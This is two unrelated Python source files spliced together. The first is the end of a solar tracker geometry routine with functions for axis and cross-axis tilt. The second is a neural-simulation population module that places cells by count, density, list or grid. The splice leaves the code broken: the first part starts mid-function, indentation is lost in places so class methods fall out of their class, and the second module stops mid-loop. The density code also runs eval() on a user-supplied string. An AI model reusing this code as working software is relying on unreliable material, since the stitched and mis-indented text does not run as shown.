    # Will Holmgren (@wholmgren), U. Arizona. March, 2015.

    # remember the index so the output can be rebuilt as a DataFrame
    if isinstance(apparent_zenith, pd.Series):
        index = apparent_zenith.index
    else:
        index = None

    # convert scalars to arrays
    apparent_azimuth = np.atleast_1d(apparent_azimuth)
    apparent_zenith = np.atleast_1d(apparent_zenith)

    if apparent_azimuth.ndim > 1 or apparent_zenith.ndim > 1:
        raise ValueError('Input dimensions must not exceed 1')

    # Calculate sun position x, y, z using coordinate system as in [1], Eq 1.

    # NOTE: solar elevation = 90 - solar zenith, then use trig identities:
    # sin(90-x) = cos(x) & cos(90-x) = sin(x)
    sin_zenith = sind(apparent_zenith)
    x = sin_zenith * sind(apparent_azimuth)
    y = sin_zenith * cosd(apparent_azimuth)
    z = cosd(apparent_zenith)

    # Assume the tracker reference frame is right-handed. Positive y-axis is
    # oriented along tracking axis; from north, the y-axis is rotated clockwise
    # by the axis azimuth and tilted from horizontal by the axis tilt. The
    # positive x-axis is 90 deg clockwise from the y-axis and parallel to
    # horizontal (e.g., if the y-axis is south, the x-axis is west); the
    # positive z-axis is normal to the x and y axes, pointed upward.

    # Calculate sun position (xp, yp, zp) in tracker coordinate system using
    # [1] Eq 4.

    cos_axis_azimuth = cosd(axis_azimuth)
    sin_axis_azimuth = sind(axis_azimuth)
    cos_axis_tilt = cosd(axis_tilt)
    sin_axis_tilt = sind(axis_tilt)
    xp = x*cos_axis_azimuth - y*sin_axis_azimuth
    yp = (x*cos_axis_tilt*sin_axis_azimuth
          + y*cos_axis_tilt*cos_axis_azimuth
          - z*sin_axis_tilt)
    zp = (x*sin_axis_tilt*sin_axis_azimuth
          + y*sin_axis_tilt*cos_axis_azimuth
          + z*cos_axis_tilt)

    # The ideal tracking angle wid is the rotation to place the sun position
    # vector (xp, yp, zp) in the (y, z) plane, which is normal to the panel and
    # contains the axis of rotation. wid = 0 indicates that the panel is
    # horizontal. Here, our convention is that a clockwise rotation is
    # positive, to view rotation angles in the same frame of reference as
    # azimuth. For example, for a system with tracking axis oriented south, a
    # rotation toward the east is negative, and a rotation to the west is
    # positive. This is a right-handed rotation around the tracker y-axis.

    # Calculate angle from x-y plane to projection of sun vector onto x-z plane
    # using [1] Eq. 5.

    wid = np.degrees(np.arctan2(xp, zp))

    # filter for sun above panel horizon
    zen_gt_90 = apparent_zenith > 90
    wid[zen_gt_90] = np.nan

    # Account for backtracking
    if backtrack:
        # distance between rows in terms of rack lengths relative to cross-axis
        # tilt
        axes_distance = 1/(gcr * cosd(cross_axis_tilt))

        # NOTE: account for rare angles below array, see GH 824
        temp = np.abs(axes_distance * cosd(wid - cross_axis_tilt))

        # backtrack angle using [1], Eq. 14
        with np.errstate(invalid='ignore'):
            wc = np.degrees(-np.sign(wid)*np.arccos(temp))

        # NOTE: in the middle of the day, arccos(temp) is out of range because
        # there's no row-to-row shade to avoid, & backtracking is unnecessary
        # [1], Eqs. 15-16
        with np.errstate(invalid='ignore'):
            tracker_theta = wid + np.where(temp < 1, wc, 0)
    else:
        tracker_theta = wid

    # NOTE: max_angle defined relative to zero-point rotation, not the
    # system-plane normal
    tracker_theta = np.clip(tracker_theta, -max_angle, max_angle)

    # Calculate panel normal vector in panel-oriented x, y, z coordinates.
    # y-axis is axis of tracker rotation. tracker_theta is a compass angle
    # (clockwise is positive) rather than a trigonometric angle.
    # NOTE: the *0 is a trick to preserve NaN values.
    panel_norm = np.array([sind(tracker_theta),
                           tracker_theta*0,
                           cosd(tracker_theta)])

    # sun position in vector format in panel-oriented x, y, z coordinates
    sun_vec = np.array([xp, yp, zp])

    # calculate angle-of-incidence on panel
    # TODO: use irradiance.aoi
    projection = np.clip(np.sum(sun_vec*panel_norm, axis=0), -1, 1)
    aoi = np.degrees(np.arccos(projection))

    # Calculate panel tilt and azimuth in a coordinate system where the panel
    # tilt is the angle from horizontal, and the panel azimuth is the compass
    # angle (clockwise from north) to the projection of the panel's normal to
    # the earth's surface. These outputs are provided for convenience and
    # comparison with other PV software which use these angle conventions.

    # Project normal vector to earth surface. First rotate about x-axis by
    # angle -axis_tilt so that y-axis is also parallel to earth surface, then
    # project.

    # Calculate standard rotation matrix
    rot_x = np.array([[1, 0, 0],
                      [0, cosd(-axis_tilt), -sind(-axis_tilt)],
                      [0, sind(-axis_tilt), cosd(-axis_tilt)]])

    # panel_norm_earth contains the normal vector expressed in earth-surface
    # coordinates (z normal to surface, y aligned with tracker axis parallel to
    # earth)
    panel_norm_earth = np.dot(rot_x, panel_norm).T

    # projection to plane tangent to earth surface, in earth surface
    # coordinates
    projected_normal = np.array([panel_norm_earth[:, 0],
                                 panel_norm_earth[:, 1],
                                 panel_norm_earth[:, 2]*0]).T

    # calculate vector magnitudes
    projected_normal_mag = np.sqrt(np.nansum(projected_normal**2, axis=1))

    # renormalize the projected vector, avoid creating nan values.
    non_zeros = projected_normal_mag != 0
    projected_normal[non_zeros] = (projected_normal[non_zeros].T /
                                   projected_normal_mag[non_zeros]).T

    # calculation of surface_azimuth
    surface_azimuth = \
        np.degrees(np.arctan2(projected_normal[:, 1], projected_normal[:, 0]))

    # Rotate 0 reference from panel's x-axis to its y-axis and then back to
    # north.
    surface_azimuth = 90 - surface_azimuth + axis_azimuth

    # Map azimuth into [0,360) domain.
    with np.errstate(invalid='ignore'):
        surface_azimuth = surface_azimuth % 360

    # Calculate surface_tilt
    dotproduct = (panel_norm_earth * projected_normal).sum(axis=1)
    surface_tilt = 90 - np.degrees(np.arccos(dotproduct))

    # Bundle DataFrame for return values and filter for sun below horizon.
    out = {'tracker_theta': tracker_theta, 'aoi': aoi,
           'surface_tilt': surface_tilt, 'surface_azimuth': surface_azimuth}
    if index is not None:
        out = pd.DataFrame(out, index=index)
        out = out[['tracker_theta', 'aoi', 'surface_azimuth', 'surface_tilt']]
        out[zen_gt_90] = np.nan
    else:
        out = {k: np.where(zen_gt_90, np.nan, v) for k, v in out.items()}

    return out
def calc_axis_tilt(slope_azimuth, slope_tilt, axis_azimuth):
    """
    Calculate tracker axis tilt in the global reference frame when on a sloped
    plane.

    Parameters
    ----------
    slope_azimuth : float
        direction of normal to slope on horizontal [degrees]
    slope_tilt : float
        tilt of normal to slope relative to vertical [degrees]
    axis_azimuth : float
        direction of tracker axes on horizontal [degrees]

    Returns
    -------
    axis_tilt : float
        tilt of tracker [degrees]

    See also
    --------
    pvlib.tracking.singleaxis
    pvlib.tracking.calc_cross_axis_tilt

    Notes
    -----
    See [1]_ for derivation of equations.

    References
    ----------
    .. [1] Kevin Anderson and Mark Mikofski, "Slope-Aware Backtracking for
       Single-Axis Trackers", Technical Report NREL/TP-5K00-76626, July 2020.
       https://www.nrel.gov/docs/fy20osti/76626.pdf
    """
    # azimuth of the tracker axes measured from the slope normal's azimuth
    relative_azimuth = axis_azimuth - slope_azimuth
    # [1] Eqs. 18-19: tan(axis_tilt) = cos(delta_gamma) * tan(slope_tilt)
    return np.degrees(np.arctan(cosd(relative_azimuth) * tand(slope_tilt)))
def _calc_tracker_norm(ba, bg, dg):
    """
    Calculate tracker normal, v, cross product of tracker axis and unit normal,
    N, to the system slope plane.

    Parameters
    ----------
    ba : float
        axis tilt [degrees]
    bg : float
        ground tilt [degrees]
    dg : float
        delta gamma, difference between axis and ground azimuths [degrees]

    Returns
    -------
    vector : tuple
        vx, vy, vz
    """
    # precompute the trig terms shared by the components
    sin_ba, cos_ba = sind(ba), cosd(ba)
    sin_bg, cos_bg = sind(bg), cosd(bg)
    sin_dg, cos_dg = sind(dg), cosd(dg)
    return (
        sin_dg * cos_ba * cos_bg,                     # vx
        sin_ba * sin_bg + cos_dg * cos_ba * cos_bg,   # vy
        -sin_dg * sin_bg * cos_ba,                    # vz
    )
def _calc_beta_c(v, dg, ba):
    """
    Calculate the cross-axis tilt angle.

    Parameters
    ----------
    v : tuple
        tracker normal
    dg : float
        delta gamma, difference between axis and ground azimuths [degrees]
    ba : float
        axis tilt [degrees]

    Returns
    -------
    beta_c : float
        cross-axis tilt angle [radians]
    """
    vx, vy, vz = v
    # rotate v by delta-gamma and axis tilt, take the z-component, and
    # normalize by |v| before inverting the sine
    numerator = (vx * cosd(dg) - vy * sind(dg)) * sind(ba) + vz * cosd(ba)
    return np.arcsin(numerator / np.sqrt(np.dot(v, v)))
def calc_cross_axis_tilt(
        slope_azimuth, slope_tilt, axis_azimuth, axis_tilt):
    """
    Calculate the angle, relative to horizontal, of the line formed by the
    intersection between the slope containing the tracker axes and a plane
    perpendicular to the tracker axes.

    Use the cross-axis tilt to avoid row-to-row shade when backtracking on a
    slope not parallel with the axis azimuth. Cross-axis tilt should be
    specified using a right-handed convention. For example, trackers with axis
    azimuth of 180 degrees (heading south) will have a negative cross-axis tilt
    if the tracker axes plane slopes down to the east and positive cross-axis
    tilt if the tracker axes plane slopes up to the east.

    Parameters
    ----------
    slope_azimuth : float
        direction of the normal to the slope containing the tracker axes, when
        projected on the horizontal [degrees]
    slope_tilt : float
        angle of the slope containing the tracker axes, relative to horizontal
        [degrees]
    axis_azimuth : float
        direction of tracker axes projected on the horizontal [degrees]
    axis_tilt : float
        tilt of trackers relative to horizontal [degrees]

    Returns
    -------
    cross_axis_tilt : float
        angle, relative to horizontal, of the line formed by the intersection
        between the slope containing the tracker axes and a plane perpendicular
        to the tracker axes [degrees]

    See also
    --------
    pvlib.tracking.singleaxis
    pvlib.tracking.calc_axis_tilt

    Notes
    -----
    See [1]_ for derivation of equations.

    References
    ----------
    .. [1] Kevin Anderson and Mark Mikofski, "Slope-Aware Backtracking for
       Single-Axis Trackers", Technical Report NREL/TP-5K00-76626, July 2020.
       https://www.nrel.gov/docs/fy20osti/76626.pdf
    """
    # delta-gamma, difference between axis and slope azimuths
    azimuth_difference = axis_azimuth - slope_azimuth
    # tracker normal from [1] equation 22
    tracker_normal = _calc_tracker_norm(axis_tilt, slope_tilt,
                                        azimuth_difference)
    # cross-axis tilt from [1] equation 26, converted to degrees
    return np.degrees(
        _calc_beta_c(tracker_normal, azimuth_difference, axis_tilt))
|
|
"""
pop.py
Contains Population related classes
Contributors: salvadordura@gmail.com
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import map
from builtins import range
try:
basestring
except NameError:
basestring = str
from future import standard_library
standard_library.install_aliases()
from numpy import pi, sqrt, sin, cos, arccos
import numpy as np
from neuron import h # Import NEURON
###############################################################################
#
# POPULATION CLASS
#
###############################################################################
class Pop (object):
''' Python class to instantiate the network population '''
def __init__(self, label, tags):
self.tags = tags # list of tags/attributes of population (eg. numCells, cellModel,...)
self.tags['pop'] = label
self.cellGids = [] # list of cell gids beloging to this pop
self._setCellClass() # set type of cell
self.rand = h.Random() # random number generator
def _distributeCells(self, numCellsPop):
''' distribute cells across compute nodes using round-robin'''
from .. import sim
hostCells = {}
for i in range(sim.nhosts):
hostCells[i] = []
for i in range(numCellsPop):
hostCells[sim.nextHost].append(i)
sim.nextHost+=1
if sim.nextHost>=sim.nhosts:
sim.nextHost=0
if sim.cfg.verbose:
print(("Distributed population of %i cells on %s hosts: %s, next: %s"%(numCellsPop,sim.nhosts,hostCells,sim.nextHost)))
return hostCells
def createCells(self):
'''Function to instantiate Cell objects based on the characteristics of this population'''
# add individual cells
if 'cellsList' in self.tags:
cells = self.createCellsList()
# create cells based on fixed number of cells
elif 'numCells' in self.tags:
cells = self.createCellsFixedNum()
# create cells based on density (optional ynorm-dep)
elif 'density' in self.tags:
cells = self.createCellsDensity()
# create cells based on density (optional ynorm-dep)
elif 'gridSpacing' in self.tags:
cells = self.createCellsGrid()
# not enough tags to create cells
else:
self.tags['numCells'] = 1
print('Warninig: number or density of cells not specified for population %s; defaulting to numCells = 1' % (self.tags['pop']))
cells = self.createCellsFixedNum()
return cells
    def createCellsFixedNum (self):
        '''Create population cells based on a fixed number of cells.

        Draws reproducible random 3-D locations (uniform in the network
        volume, reshaped for cylinder/ellipsoid networks), distributes the
        cells across MPI ranks, and instantiates the Cell objects assigned
        to this node.

        Returns:
            list: Cell objects created on this node.
        '''
        from .. import sim

        cells = []
        # seed the NEURON RNG from pop size, gid offset and the 'loc' seed
        # so locations are reproducible across runs and nodes
        self.rand.Random123(self.tags['numCells'], sim.net.lastGid, sim.cfg.seeds['loc'])
        self.rand.uniform(0, 1)
        vec = h.Vector(self.tags['numCells']*3)
        vec.setrand(self.rand)
        randLocs = np.array(vec).reshape(self.tags['numCells'], 3)  # create random x,y,z locations

        if sim.net.params.shape == 'cylinder':
            # Use the x,z random values to sample uniformly inside a unit
            # disc (sqrt(rho) corrects the radial density), keeping y as-is
            rho = randLocs[:,0]  # use x rand value as the radius rho in the interval [0, 1)
            phi = 2 * pi * randLocs[:,2]  # use z rand value as the angle phi in the interval [0, 2*pi)
            x = (1 + sqrt(rho) * cos(phi))/2.0
            z = (1 + sqrt(rho) * sin(phi))/2.0
            randLocs[:,0] = x
            randLocs[:,2] = z
        elif sim.net.params.shape == 'ellipsoid':
            # Use the x,y,z random values to sample uniformly inside a unit
            # sphere (cube-root radius + uniform cos(theta))
            rho = np.power(randLocs[:,0], 1.0/3.0)  # use x rand value as the radius rho in the interval [0, 1); cuberoot
            phi = 2 * pi * randLocs[:,1]  # use y rand value as the angle phi in the interval [0, 2*pi)
            costheta = (2 * randLocs[:,2]) - 1  # use z rand value as cos(theta) in the interval [-1, 1); ensures uniform dist
            theta = arccos(costheta)  # obtain theta from cos(theta)
            x = (1 + rho * cos(phi) * sin(theta))/2.0
            y = (1 + rho * sin(phi) * sin(theta))/2.0
            z = (1 + rho * cos(theta))/2.0
            randLocs[:,0] = x
            randLocs[:,1] = y
            randLocs[:,2] = z

        for icoord, coord in enumerate(['x', 'y', 'z']):
            if coord+'Range' in self.tags:  # if user provided absolute range, convert to normalized
                self.tags[coord+'normRange'] = [float(point) / getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'Range']]
            # constrain to range set by user
            if coord+'normRange' in self.tags:  # if normalized range, rescale random locations
                minv = self.tags[coord+'normRange'][0]
                maxv = self.tags[coord+'normRange'][1]
                randLocs[:,icoord] = randLocs[:,icoord] * (maxv-minv) + minv

        # only instantiate the cells assigned to this MPI rank
        for i in self._distributeCells(int(sim.net.params.scale * self.tags['numCells']))[sim.rank]:
            gid = sim.net.lastGid+i
            self.cellGids.append(gid)  # add gid list of cells belonging to this population - not needed?
            cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells}  # copy all pop tags to cell tags, except those that are pop-specific
            cellTags['pop'] = self.tags['pop']
            cellTags['xnorm'] = randLocs[i,0]  # set normalized x location (0-1)
            cellTags['ynorm'] = randLocs[i,1]  # set normalized y location (0-1)
            cellTags['znorm'] = randLocs[i,2]  # set normalized z location (0-1)
            cellTags['x'] = sim.net.params.sizeX * randLocs[i,0]  # set x location (um)
            cellTags['y'] = sim.net.params.sizeY * randLocs[i,1]  # set y location (um)
            cellTags['z'] = sim.net.params.sizeZ * randLocs[i,2]  # set z location (um)
            if 'spkTimes' in self.tags:  # if VecStim, copy spike times to params
                if isinstance(self.tags['spkTimes'][0], list):
                    try:
                        cellTags['params']['spkTimes'] = self.tags['spkTimes'][i]  # 2D list
                    except:
                        pass
                else:
                    cellTags['params']['spkTimes'] = self.tags['spkTimes']  # 1D list (same for all)
            cells.append(self.cellModelClass(gid, cellTags))  # instantiate Cell object
            if sim.cfg.verbose: print(('Cell %d/%d (gid=%d) of pop %s, on node %d, '%(i, sim.net.params.scale * self.tags['numCells']-1, gid, self.tags['pop'], sim.rank)))
        # NOTE(review): gid counter advances by the unscaled numCells even
        # though the loop above distributes scale*numCells — confirm intended
        sim.net.lastGid = sim.net.lastGid + self.tags['numCells']
        return cells
def createCellsDensity (self):
    ''' Create population cells based on density.

    Computes the network (sub)volume for the configured shape, derives
    'numCells' either from a constant density (cells/mm^3) or from a
    density function of one normalized coordinate, draws random x/y/z
    locations with NEURON's Random123 stream, reshapes them to the
    network shape, and instantiates one cell per location on this rank.
    Returns the list of instantiated cell objects for this MPI rank.
    '''
    from .. import sim
    cells = []
    shape = sim.net.params.shape
    sizeX = sim.net.params.sizeX
    sizeY = sim.net.params.sizeY
    sizeZ = sim.net.params.sizeZ
    # calculate volume in mm^3 (sizes are in um, hence the /1e3 factors)
    if shape == 'cuboid':
        volume = sizeY/1e3 * sizeX/1e3 * sizeZ/1e3
    elif shape == 'cylinder':
        volume = sizeY/1e3 * sizeX/1e3/2 * sizeZ/1e3/2 * pi
    elif shape == 'ellipsoid':
        volume = sizeY/1e3/2.0 * sizeX/1e3/2.0 * sizeZ/1e3/2.0 * pi * 4.0 / 3.0
    for coord in ['x', 'y', 'z']:
        if coord+'Range' in self.tags: # if user provided absolute range, convert to normalized
            self.tags[coord+'normRange'] = [point / getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'Range']]
        if coord+'normRange' in self.tags: # if normalized range, rescale volume
            minv = self.tags[coord+'normRange'][0]
            maxv = self.tags[coord+'normRange'][1]
            volume = volume * (maxv-minv)
    funcLocs = None # start with no locations as a function of density function
    # NOTE(review): 'basestring' is Python 2 only — presumably aliased by a
    # compatibility import at the top of the file; confirm.
    if isinstance(self.tags['density'], basestring): # check if density is given as a function
        if shape == 'cuboid': # only available for cuboids
            strFunc = self.tags['density'] # string containing function
            strVars = [var for var in ['xnorm', 'ynorm', 'znorm'] if var in strFunc] # get list of variables used
            if not len(strVars) == 1:
                print('Error: density function (%s) for population %s does not include "xnorm", "ynorm" or "znorm"'%(strFunc,self.tags['pop']))
                return
            coordFunc = strVars[0]
            lambdaStr = 'lambda ' + coordFunc +': ' + strFunc # convert to lambda function
            densityFunc = eval(lambdaStr)
            minRange = self.tags[coordFunc+'Range'][0]
            maxRange = self.tags[coordFunc+'Range'][1]
            interval = 0.001 # interval of location values to evaluate func in order to find the max cell density
            maxDensity = max(list(map(densityFunc, (np.arange(minRange, maxRange, interval))))) # max cell density
            maxCells = volume * maxDensity # max number of cells based on max value of density func
            # seed the per-population Random123 stream for reproducible locations
            self.rand.Random123(int(maxDensity), sim.net.lastGid, sim.cfg.seeds['loc'])
            locsAll = minRange + ((maxRange-minRange)) * np.array([self.rand.uniform(0, 1) for i in range(int(maxCells))]) # random location values
            locsProb = np.array(list(map(densityFunc, locsAll))) / maxDensity # calculate normalized density for each location value (used to prune)
            allrands = np.array([self.rand.uniform(0, 1) for i in range(len(locsProb))]) # create an array of random numbers for checking each location pos
            # rejection sampling: keep each candidate with probability proportional to the density at its location
            makethiscell = locsProb>allrands # perform test to see whether or not this cell should be included (pruning based on density func)
            funcLocs = [locsAll[i] for i in range(len(locsAll)) if i in np.array(makethiscell.nonzero()[0],dtype='int')] # keep only subset of yfuncLocs based on density func
            self.tags['numCells'] = len(funcLocs) # final number of cells after pruning of location values based on density func
            if sim.cfg.verbose: print('Volume=%.2f, maxDensity=%.2f, maxCells=%.0f, numCells=%.0f'%(volume, maxDensity, maxCells, self.tags['numCells']))
        else:
            print('Error: Density functions are only implemented for cuboid shaped networks')
            exit(0)
    else: # constant density (no coordinate dependence)
        self.tags['numCells'] = int(self.tags['density'] * volume) # = density (cells/mm^3) * volume (mm^3)
    # calculate locations of cells
    self.rand.Random123(self.tags['numCells'], sim.net.lastGid, sim.cfg.seeds['loc'])
    self.rand.uniform(0, 1)
    vec = h.Vector(self.tags['numCells']*3)
    vec.setrand(self.rand)
    randLocs = np.array(vec).reshape(self.tags['numCells'], 3) # create random x,y,z locations
    if sim.net.params.shape == 'cylinder':
        # Use the x,z random values to sample uniformly over the unit disc
        rho = randLocs[:,0] # use x rand value as the radius rho in the interval [0, 1)
        phi = 2 * pi * randLocs[:,2] # use z rand value as the angle phi in the interval [0, 2*pi)
        x = (1 + sqrt(rho) * cos(phi))/2.0
        z = (1 + sqrt(rho) * sin(phi))/2.0
        randLocs[:,0] = x
        randLocs[:,2] = z
    elif sim.net.params.shape == 'ellipsoid':
        # Use the x,y,z random values to sample uniformly inside the unit ball
        rho = np.power(randLocs[:,0], 1.0/3.0) # use x rand value as the radius rho in the interval [0, 1); cuberoot
        phi = 2 * pi * randLocs[:,1] # use y rand value as the angle phi in the interval [0, 2*pi)
        costheta = (2 * randLocs[:,2]) - 1 # use z rand value as cos(theta) in the interval [-1, 1); ensures uniform dist
        theta = arccos(costheta) # obtain theta from cos(theta)
        x = (1 + rho * cos(phi) * sin(theta))/2.0
        y = (1 + rho * sin(phi) * sin(theta))/2.0
        z = (1 + rho * cos(theta))/2.0
        randLocs[:,0] = x
        randLocs[:,1] = y
        randLocs[:,2] = z
    for icoord, coord in enumerate(['x', 'y', 'z']):
        if coord+'normRange' in self.tags: # if normalized range, rescale random locations
            minv = self.tags[coord+'normRange'][0]
            maxv = self.tags[coord+'normRange'][1]
            randLocs[:,icoord] = randLocs[:,icoord] * (maxv-minv) + minv
        if funcLocs and coordFunc == coord+'norm': # if locations for this coordinate calculated using density function
            randLocs[:,icoord] = funcLocs
    if sim.cfg.verbose and not funcLocs: print('Volume=%.4f, density=%.2f, numCells=%.0f'%(volume, self.tags['density'], self.tags['numCells']))
    for i in self._distributeCells(self.tags['numCells'])[sim.rank]:
        gid = sim.net.lastGid+i
        self.cellGids.append(gid) # add gid list of cells belonging to this population - not needed?
        cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells} # copy all pop tags to cell tags, except those that are pop-specific
        cellTags['pop'] = self.tags['pop']
        cellTags['xnorm'] = randLocs[i,0] # normalized x location (0-1)
        cellTags['ynorm'] = randLocs[i,1] # normalized y location (0-1)
        cellTags['znorm'] = randLocs[i,2] # normalized z location (0-1)
        cellTags['x'] = sizeX * randLocs[i,0] # calculate x location (um)
        cellTags['y'] = sizeY * randLocs[i,1] # calculate y location (um)
        cellTags['z'] = sizeZ * randLocs[i,2] # calculate z location (um)
        cells.append(self.cellModelClass(gid, cellTags)) # instantiate Cell object
        if sim.cfg.verbose:
            print(('Cell %d/%d (gid=%d) of pop %s, pos=(%2.f, %2.f, %2.f), on node %d, '%(i, self.tags['numCells']-1, gid, self.tags['pop'],cellTags['x'], cellTags['y'], cellTags['z'], sim.rank)))
    sim.net.lastGid = sim.net.lastGid + self.tags['numCells']
    return cells
def createCellsList (self):
    ''' Create population cells based on list of individual cells.

    Each entry of self.tags['cellsList'] supplies per-cell tags (including
    optional absolute or normalized coordinates); missing coordinates
    default to 0. Returns the list of instantiated cells for this rank.
    '''
    from .. import sim
    cells = []
    self.tags['numCells'] = len(self.tags['cellsList'])
    for i in self._distributeCells(len(self.tags['cellsList']))[sim.rank]:
        #if 'cellModel' in self.tags['cellsList'][i]:
        #    self.cellModelClass = getattr(f, self.tags['cellsList'][i]['cellModel']) # select cell class to instantiate cells based on the cellModel tags
        gid = sim.net.lastGid+i
        self.cellGids.append(gid) # add gid list of cells belonging to this population - not needed?
        cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells} # copy all pop tags to cell tags, except those that are pop-specific
        cellTags['pop'] = self.tags['pop']
        cellTags.update(self.tags['cellsList'][i]) # add tags specific to this cell
        for coord in ['x','y','z']:
            if coord in cellTags: # if absolute coord exists
                cellTags[coord+'norm'] = cellTags[coord]/getattr(sim.net.params, 'size'+coord.upper()) # calculate norm coord
            elif coord+'norm' in cellTags: # elif norm coord exists
                cellTags[coord] = cellTags[coord+'norm']*getattr(sim.net.params, 'size'+coord.upper()) # calculate abs coord
            else:
                cellTags[coord+'norm'] = cellTags[coord] = 0
        # NOTE(review): compares against 'Vecstim' (lowercase 's') — confirm
        # that this matches the cellModel label used elsewhere ('VecStim'?).
        if 'cellModel' in self.tags.keys() and self.tags['cellModel'] == 'Vecstim': # if VecStim, copy spike times to params
            cellTags['params']['spkTimes'] = self.tags['cellsList'][i]['spkTimes']
        cells.append(self.cellModelClass(gid, cellTags)) # instantiate Cell object
        # Fixed: previously printed 'pop %d' with the loop index i instead of
        # the population label, unlike every sibling createCells* method.
        if sim.cfg.verbose: print(('Cell %d/%d (gid=%d) of pop %s, on node %d, '%(i, self.tags['numCells']-1, gid, self.tags['pop'], sim.rank)))
    sim.net.lastGid = sim.net.lastGid + len(self.tags['cellsList'])
    return cells
def createCellsGrid (self):
    ''' Create population cells arranged on a regular 3D grid.

    Grid points are generated every self.tags['gridSpacing'] um within the
    (possibly user-restricted) x/y/z ranges, endpoints included. Returns
    the list of instantiated cells for this rank.
    '''
    from .. import sim
    cells = []
    rangeLocs = [[0, getattr(sim.net.params, 'size'+coord)] for coord in ['X','Y','Z']]
    for icoord, coord in enumerate(['x', 'y', 'z']):
        # constrain to range set by user
        if coord+'normRange' in self.tags: # if normalized range, convert to absolute
            # Fixed: previously iterated self.tags[coord+'Range'] here, which
            # raises KeyError when only a normRange was provided (and would
            # scale absolute values by the network size if both existed).
            self.tags[coord+'Range'] = [float(point) * getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'normRange']]
        if coord+'Range' in self.tags: # if user provided absolute range, calculate normalized range
            self.tags[coord+'normRange'] = [float(point) / getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'Range']]
            rangeLocs[icoord] = [self.tags[coord+'Range'][0], self.tags[coord+'Range'][1]]
    gridSpacing = self.tags['gridSpacing']
    gridLocs = []
    # +1 so that the upper boundary itself is included in the grid
    for x in np.arange(rangeLocs[0][0], rangeLocs[0][1]+1, gridSpacing):
        for y in np.arange(rangeLocs[1][0], rangeLocs[1][1]+1, gridSpacing):
            for z in np.arange(rangeLocs[2][0], rangeLocs[2][1]+1, gridSpacing):
                gridLocs.append((x, y, z))
    numCells = len(gridLocs)
    for i in self._distributeCells(numCells)[sim.rank]:
        gid = sim.net.lastGid+i
        self.cellGids.append(gid) # add gid list of cells belonging to this population - not needed?
        cellTags = {k: v for (k, v) in self.tags.items() if k in sim.net.params.popTagsCopiedToCells} # copy all pop tags to cell tags, except those that are pop-specific
        cellTags['pop'] = self.tags['pop']
        cellTags['xnorm'] = gridLocs[i][0] / sim.net.params.sizeX # normalized x location
        cellTags['ynorm'] = gridLocs[i][1] / sim.net.params.sizeY # normalized y location
        cellTags['znorm'] = gridLocs[i][2] / sim.net.params.sizeZ # normalized z location
        cellTags['x'] = gridLocs[i][0] # set x location (um)
        cellTags['y'] = gridLocs[i][1] # set y location (um)
        cellTags['z'] = gridLocs[i][2] # set z location (um)
        cells.append(self.cellModelClass(gid, cellTags)) # instantiate Cell object
        if sim.cfg.verbose: print(('Cell %d/%d (gid=%d) of pop %s, on node %d, '%(i, numCells, gid, self.tags['pop'], sim.rank)))
    sim.net.lastGid = sim.net.lastGid + numCells
    return cells
def _setCellClass (self):
    ''' Set cell class (CompartCell, PointCell, etc).

    NeuroML2-imported populations get their dedicated classes; otherwise,
    if the cellModel tag names an existing point-process mechanism in h,
    use PointCell (moving non-structural tags into tags['params']);
    otherwise fall back to CompartCell.
    '''
    from .. import sim
    # Check whether it's a NeuroML2 based cell
    if 'originalFormat' in self.tags:
        if self.tags['originalFormat'] == 'NeuroML2':
            self.cellModelClass = sim.NML2Cell
        if self.tags['originalFormat'] == 'NeuroML2_SpikeSource':
            self.cellModelClass = sim.NML2SpikeSource
    else:
        # set cell class: CompartCell for compartmental cells or PointCell for point neurons (NetStims, IntFire1,...)
        try: # check if cellModel corresponds to an existing point process mechanism; if so, use PointCell
            tmp = getattr(h, self.tags['cellModel'])
            self.cellModelClass = sim.PointCell
            excludeTags = ['pop', 'cellModel', 'cellType', 'numCells', 'density', 'cellsList',
                           'xRange', 'yRange', 'zRange', 'xnormRange', 'ynormRange', 'znormRange', 'vref', 'spkTimes']
            params = {k: v for k,v in self.tags.items() if k not in excludeTags}
            self.tags['params'] = params
            for k in self.tags['params']: self.tags.pop(k)
            sim.net.params.popTagsCopiedToCells.append('params')
        except Exception:
            # Fixed: previously used getattr(self.tags, 'cellModel', None),
            # which always returns None on a dict (dict keys are not
            # attributes), so this warning could never fire.
            if self.tags.get('cellModel', None) in ['NetStim', 'VecStim', 'IntFire1', 'IntFire2', 'IntFire4']:
                print('Warning: could not find %s point process mechanism required for population %s' % (self.tags['cellModel'], self.tags['pop']))
            self.cellModelClass = sim.CompartCell # otherwise assume has sections and some cellParam rules apply to it; use CompartCell
def calcRelativeSegCoords(self):
    """Calculate segment coordinates from 3d point coordinates
    Used for LFP calc (one per population cell; assumes same morphology).

    Uses the first cell of this population present on this rank as the
    template; coordinates are shifted so the soma sits at the origin.
    Returns a dict with start/end points ('p0'/'p1', shape (3, nseg)) and
    start/end diameters ('d0'/'d1') for every segment, or -1 if no cell
    of this population lives on this rank."""
    from .. import sim
    localPopGids = list(set(sim.net.gid2lid.keys()).intersection(set(self.cellGids)))
    if localPopGids:
        cell = sim.net.cells[sim.net.gid2lid[localPopGids[0]]]
    else:
        return -1
    ix = 0 # segment index
    p3dsoma = cell.getSomaPos()
    # total number of segments across all sections of the template cell
    nseg = sum([sec['hObj'].nseg for sec in list(cell.secs.values())])
    p0 = np.zeros((3, nseg)) # hold the coordinates of segment starting points
    p1 = np.zeros((3, nseg)) # hold the coordinates of segment end points
    d0 = np.zeros(nseg) # diameters at segment starting points
    d1 = np.zeros(nseg) # diameters at segment end points
    for sec in list(cell.secs.values()):
        hSec = sec['hObj']
        hSec.push() # make this the currently accessed section for h.n3d/x3d/...
        n3d = int(h.n3d()) # get number of n3d points in each section
        p3d = np.zeros((3, n3d)) # to hold locations of 3D morphology for the current section
        l3d = np.zeros(n3d) # to hold arc lengths of 3D points for the current section
        diam3d = np.zeros(n3d) # to hold diameters of 3D points for the current section
        for i in range(n3d):
            p3d[0, i] = h.x3d(i) - p3dsoma[0]
